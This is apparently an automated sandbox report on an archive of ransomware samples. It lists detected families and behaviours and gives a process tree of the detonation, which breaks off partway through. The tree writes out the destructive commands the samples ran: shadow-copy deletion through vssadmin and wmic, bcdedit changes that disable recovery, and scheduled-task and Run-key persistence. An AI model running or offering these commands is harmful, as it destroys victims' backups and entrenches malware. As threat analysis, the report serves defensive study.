  • Luminosity 3 IoCs

    Luminosity is a RAT family that was on sale, while claiming to be a system administration utility.

  • Luminosity family
  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Modifies firewall policy service 3 TTPs 5 IoCs
  • Modiloader family
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • TeslaCrypt, AlphaCrypt

    Ransomware based on CryptoLocker. Shut down by the developers in 2016.

  • Teslacrypt family
  • Troldesh family
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Contacts a large (8953) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 5 IoCs
  • Renames multiple (131) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (380) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (57) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 8 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 16 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates connected drives 3 TTPs 43 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 6 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 39 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 27 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • NSIS installer 14 IoCs
  • Interacts with shadow copies 3 TTPs 10 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 5 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 21 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 1 IoCs
  • Opens file in notepad (likely ransom note) 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 33 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 10 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1100
      • C:\Program Files\7-Zip\7zFM.exe
        "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00288.7z"
        2⤵
        • DcRat
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:2792
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1640
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3016
        • C:\Users\Admin\Desktop\00288\HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe
          HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:3048
          • C:\Users\Admin\Desktop\00288\HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe
            "C:\Users\Admin\Desktop\00288\HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Enumerates connected drives
            • System Location Discovery: System Language Discovery
            PID:14532
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k vssadmin.exe Delete Shadows /All /Quiet
              5⤵
                PID:16760
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /k bcdedit.exe /set {default} recoveryenabled No
                5⤵
                  PID:16756
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                  5⤵
                    PID:16744
              • C:\Users\Admin\Desktop\00288\HEUR-Trojan-Ransom.Win32.Bitman.gen-6ffbd3719fbff5e33fba8737b5435c66cdb7aa66a34302e125fa8bb888604670.exe
                HEUR-Trojan-Ransom.Win32.Bitman.gen-6ffbd3719fbff5e33fba8737b5435c66cdb7aa66a34302e125fa8bb888604670.exe
                3⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:3060
                • C:\Users\Admin\Desktop\00288\HEUR-Trojan-Ransom.Win32.Bitman.gen-6ffbd3719fbff5e33fba8737b5435c66cdb7aa66a34302e125fa8bb888604670.exe
                  HEUR-Trojan-Ransom.Win32.Bitman.gen-6ffbd3719fbff5e33fba8737b5435c66cdb7aa66a34302e125fa8bb888604670.exe
                  4⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:38576
                  • C:\Users\Admin\Documents\mfxriq.exe
                    C:\Users\Admin\Documents\mfxriq.exe
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:40684
                    • C:\Users\Admin\Documents\mfxriq.exe
                      C:\Users\Admin\Documents\mfxriq.exe
                      6⤵
                      • Drops file in Program Files directory
                      • Modifies data under HKEY_USERS
                      • Modifies system certificate store
                      PID:33700
                      • C:\Windows\system32\cmd.exe
                        cmd /c ubonw.bat
                        7⤵
                          PID:3292
                        • C:\Windows\System32\vssadmin.exe
                          "C:\Windows\System32\vssadmin.exe" Delete Shadows /For=C: /All /Quiet
                          7⤵
                          • Interacts with shadow copies
                          PID:19092
                        • C:\Windows\SysWOW64\NOTEPAD.EXE
                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_ReCoVeRy_+pqnjv.txt
                          7⤵
                            PID:40964
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00288\HEUR-T~2.EXE >> NUL
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:32548
                  • C:\Users\Admin\Desktop\00288\HEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exe
                    HEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exe
                    3⤵
                    • Executes dropped EXE
                    • Maps connected drives based on registry
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious behavior: MapViewOfSection
                    PID:1144
                    • C:\Users\Admin\Desktop\00288\HEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exe
                      HEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exe
                      4⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:34600
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /tn "Java" /tr "'C:\Program Files (x86)\Java\java.exe' /startup" /sc MINUTE /f /rl highest
                        5⤵
                        • DcRat
                        • Luminosity
                        • System Location Discovery: System Language Discovery
                        PID:3764
                      • C:\Windows\SysWOW64\REG.exe
                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "Java" /d "cmd /c """start """Java""" """C:\Program Files (x86)\Java\java.exe"""" /f /reg:64
                        5⤵
                        • Adds Run key to start application
                        • System Location Discovery: System Language Discovery
                        PID:25040
                  • C:\Users\Admin\Desktop\00288\Trojan-Ransom.MSIL.Agent.yh-bab7af3306f66d5deaafda1f0cd57c20e42678451a7bc70c71255f6a7e1806be.exe
                    Trojan-Ransom.MSIL.Agent.yh-bab7af3306f66d5deaafda1f0cd57c20e42678451a7bc70c71255f6a7e1806be.exe
                    3⤵
                    • Executes dropped EXE
                    • Sets desktop wallpaper using registry
                    • System Location Discovery: System Language Discovery
                    • Modifies Control Panel
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    PID:468
                  • C:\Users\Admin\Desktop\00288\Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe
                    Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    PID:2208
                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe
                      Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe
                      4⤵
                        PID:27940
                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.NSIS.Xamyh.agk-625e2c66c2b1e7fb68da887810e453b302beb981e0bcfa8415c076ffb998eb1d.exe
                      Trojan-Ransom.NSIS.Xamyh.agk-625e2c66c2b1e7fb68da887810e453b302beb981e0bcfa8415c076ffb998eb1d.exe
                      3⤵
                      • Executes dropped EXE
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1580
                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exe
                      Trojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exe
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1968
                      • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exe
                        Trojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exe
                        4⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:14428
                        • C:\Windows\SysWOW64\explorer.exe
                          "C:\Windows\system32\explorer.exe"
                          5⤵
                          • DcRat
                          • Accesses Microsoft Outlook accounts
                          • Accesses Microsoft Outlook profiles
                          • Adds Run key to start application
                          • Drops file in Windows directory
                          • Modifies Internet Explorer Phishing Filter
                          • outlook_office_path
                          • outlook_win_path
                          PID:5592
                          • C:\Windows\SysWOW64\vssadmin.exe
                            vssadmin.exe Delete Shadows /All /Quiet
                            6⤵
                            • Interacts with shadow copies
                            PID:15548
                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.aehp-8ace02526fa1fd6f000abd9e1e23b54b6fb1406b644e7350d287ebd460d98518.exe
                      Trojan-Ransom.Win32.Bitman.aehp-8ace02526fa1fd6f000abd9e1e23b54b6fb1406b644e7350d287ebd460d98518.exe
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1036
                      • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.aehp-8ace02526fa1fd6f000abd9e1e23b54b6fb1406b644e7350d287ebd460d98518.exe
                        Trojan-Ransom.Win32.Bitman.aehp-8ace02526fa1fd6f000abd9e1e23b54b6fb1406b644e7350d287ebd460d98518.exe
                        4⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:40484
                        • C:\Windows\qbqsfahnmfxr.exe
                          C:\Windows\qbqsfahnmfxr.exe
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:40412
                          • C:\Windows\qbqsfahnmfxr.exe
                            C:\Windows\qbqsfahnmfxr.exe
                            6⤵
                            • DcRat
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • System policy modification
                            PID:34664
                            • C:\Windows\System32\wbem\WMIC.exe
                              "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                              7⤵
                                PID:2352
                              • C:\Windows\SysWOW64\NOTEPAD.EXE
                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_ReCoVeRy_.TXT
                                7⤵
                                • Opens file in notepad (likely ransom note)
                                PID:43384
                              • C:\Program Files\Internet Explorer\iexplore.exe
                                "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\_ReCoVeRy_.HTM
                                7⤵
                                  PID:40280
                                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:40280 CREDAT:275457 /prefetch:2
                                    8⤵
                                      PID:40672
                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:40280 CREDAT:472069 /prefetch:2
                                      8⤵
                                        PID:26060
                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:40280 CREDAT:406541 /prefetch:2
                                        8⤵
                                          PID:10024
                                      • C:\Windows\System32\wbem\WMIC.exe
                                        "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                        7⤵
                                          PID:27808
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\QBQSFA~1.EXE
                                          7⤵
                                            PID:18984
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00288\TR1234~1.EXE
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:31324
                                  • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.ahx-0e9b8711d12f06224bf0b426e09d80f5ce27908b90b1912140cc316c0683ff01.exe
                                    Trojan-Ransom.Win32.Bitman.ahx-0e9b8711d12f06224bf0b426e09d80f5ce27908b90b1912140cc316c0683ff01.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2204
                                    • C:\Users\Admin\AppData\Roaming\Siybp\geaw.exe
                                      "C:\Users\Admin\AppData\Roaming\Siybp\geaw.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: MapViewOfSection
                                      PID:33452
                                      • C:\Windows\SysWOW64\explorer.exe
                                        "C:\Windows\SysWOW64\explorer.exe"
                                        5⤵
                                        • Modifies firewall policy service
                                        • Adds Run key to start application
                                        • Suspicious behavior: MapViewOfSection
                                        PID:41396
                                  • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exe
                                    Trojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2260
                                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exe
                                      Trojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exe
                                      4⤵
                                      • Executes dropped EXE
                                      • Drops file in Windows directory
                                      PID:26376
                                      • C:\Windows\vmsmqjynx.exe
                                        C:\Windows\vmsmqjynx.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Suspicious use of SetWindowsHookEx
                                        PID:16804
                                        • C:\Windows\vmsmqjynx.exe
                                          C:\Windows\vmsmqjynx.exe
                                          6⤵
                                          • Adds Run key to start application
                                          PID:38816
                                          • C:\Users\Admin\Documents\sxain.exe
                                            C:\Users\Admin\Documents\sxain.exe
                                            7⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:30532
                                            • C:\Windows\System32\vssadmin.exe
                                              "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
                                              8⤵
                                              • Interacts with shadow copies
                                              PID:26988
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00288\TR1A23~1.EXE
                                        5⤵
                                          PID:54964
                                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe
                                      Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                      • Suspicious use of SetWindowsHookEx
                                      PID:2416
                                      • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe
                                        Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe
                                        4⤵
                                        • Executes dropped EXE
                                        • Drops file in Windows directory
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:38476
                                        • C:\Windows\bqsfahnmfxri.exe
                                          C:\Windows\bqsfahnmfxri.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of SetWindowsHookEx
                                          PID:36968
                                          • C:\Windows\bqsfahnmfxri.exe
                                            C:\Windows\bqsfahnmfxri.exe
                                            6⤵
                                            • DcRat
                                            • Adds Run key to start application
                                            • Drops file in Program Files directory
                                            • System policy modification
                                            PID:7860
                                            • C:\Windows\System32\wbem\WMIC.exe
                                              "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                              7⤵
                                                PID:4600
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00288\TRF0B7~1.EXE
                                            5⤵
                                              PID:5240
                                        • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.jyt-08cb736232f2e90c8f3f66c2b4ef5f36630c6763322d613306a04c7484b2acad.exe
                                          Trojan-Ransom.Win32.Bitman.jyt-08cb736232f2e90c8f3f66c2b4ef5f36630c6763322d613306a04c7484b2acad.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          • Suspicious use of SetWindowsHookEx
                                          PID:2280
                                          • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.jyt-08cb736232f2e90c8f3f66c2b4ef5f36630c6763322d613306a04c7484b2acad.exe
                                            Trojan-Ransom.Win32.Bitman.jyt-08cb736232f2e90c8f3f66c2b4ef5f36630c6763322d613306a04c7484b2acad.exe
                                            4⤵
                                              PID:35856
                                              • C:\Windows\ojfkrsimvjds.exe
                                                C:\Windows\ojfkrsimvjds.exe
                                                5⤵
                                                • Suspicious use of SetThreadContext
                                                • Suspicious use of SetWindowsHookEx
                                                PID:10452
                                                • C:\Windows\ojfkrsimvjds.exe
                                                  C:\Windows\ojfkrsimvjds.exe
                                                  6⤵
                                                  • Adds Run key to start application
                                                  • System policy modification
                                                  PID:45284
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00288\TR0CEE~1.EXE
                                                5⤵
                                                  PID:9980
                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.kat-8f9525c36232f06c1988cf6c61e59fe4861960425b44e070e2433878a53254da.exe
                                              Trojan-Ransom.Win32.Bitman.kat-8f9525c36232f06c1988cf6c61e59fe4861960425b44e070e2433878a53254da.exe
                                              3⤵
                                              • Executes dropped EXE
                                              • Drops file in Windows directory
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1956
                                              • C:\Windows\hbuuvsjbfrbv.exe
                                                C:\Windows\hbuuvsjbfrbv.exe
                                                4⤵
                                                • DcRat
                                                • Drops startup file
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • Drops file in Program Files directory
                                                • Suspicious behavior: RenamesItself
                                                • Suspicious use of AdjustPrivilegeToken
                                                • System policy modification
                                                PID:14112
                                                • C:\Windows\System32\wbem\WMIC.exe
                                                  "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /noin teractive
                                                  5⤵
                                                    PID:28232
                                                  • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
                                                    5⤵
                                                    • Opens file in notepad (likely ransom note)
                                                    PID:36336
                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM
                                                    5⤵
                                                      PID:2956
                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2956 CREDAT:275457 /prefetch:2
                                                        6⤵
                                                          PID:45180
                                                      • C:\Windows\System32\wbem\WMIC.exe
                                                        "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /noin teractive
                                                        5⤵
                                                          PID:27216
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\HBUUVS~1.EXE
                                                          5⤵
                                                            PID:53820
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00288\TR68B3~1.EXE
                                                          4⤵
                                                            PID:14440
                                                        • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe
                                                          Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:1168
                                                          • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe
                                                            Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Windows directory
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5848
                                                            • C:\Windows\lpdcqkacfhfo.exe
                                                              C:\Windows\lpdcqkacfhfo.exe
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5708
                                                              • C:\Windows\lpdcqkacfhfo.exe
                                                                C:\Windows\lpdcqkacfhfo.exe
                                                                6⤵
                                                                • Adds Run key to start application
                                                                • Drops file in Program Files directory
                                                                • System policy modification
                                                                PID:38548
                                                                • C:\Users\Admin\Documents\sqtsi.exe
                                                                  C:\Users\Admin\Documents\sqtsi.exe
                                                                  7⤵
                                                                    PID:41736
                                                                    • C:\Windows\System32\vssadmin.exe
                                                                      "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
                                                                      8⤵
                                                                      • Interacts with shadow copies
                                                                      PID:41440
                                                                  • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
                                                                    7⤵
                                                                    • Opens file in notepad (likely ransom note)
                                                                    PID:16920
                                                                  • C:\Users\Admin\Documents\pyvgb.exe
                                                                    C:\Users\Admin\Documents\pyvgb.exe
                                                                    7⤵
                                                                      PID:54960
                                                                      • C:\Windows\System32\vssadmin.exe
                                                                        "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
                                                                        8⤵
                                                                        • Interacts with shadow copies
                                                                        PID:55848
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00288\TR7DE9~1.EXE
                                                                  5⤵
                                                                    PID:3624
                                                              • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Blocker.guit-7b713670c9fa7d183ca37b118af58ebd2198e0e1905f4c719bd8cdc8febd17b4.exe
                                                                Trojan-Ransom.Win32.Blocker.guit-7b713670c9fa7d183ca37b118af58ebd2198e0e1905f4c719bd8cdc8febd17b4.exe
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                PID:2052
                                                                • C:\Users\Admin\AppData\Local\CTHelpers.exe
                                                                  "C:\Users\Admin\AppData\Local\CTHelpers.exe" /d "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Blocker.guit-7b713670c9fa7d183ca37b118af58ebd2198e0e1905f4c719bd8cdc8febd17b4.exe"
                                                                  4⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • Adds Run key to start application
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:16008
                                                              • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Crypmod.ybk-b51cc02437371a610db9b934da1722e57523b1d4ac512467ca9ad033a8fa0850.exe
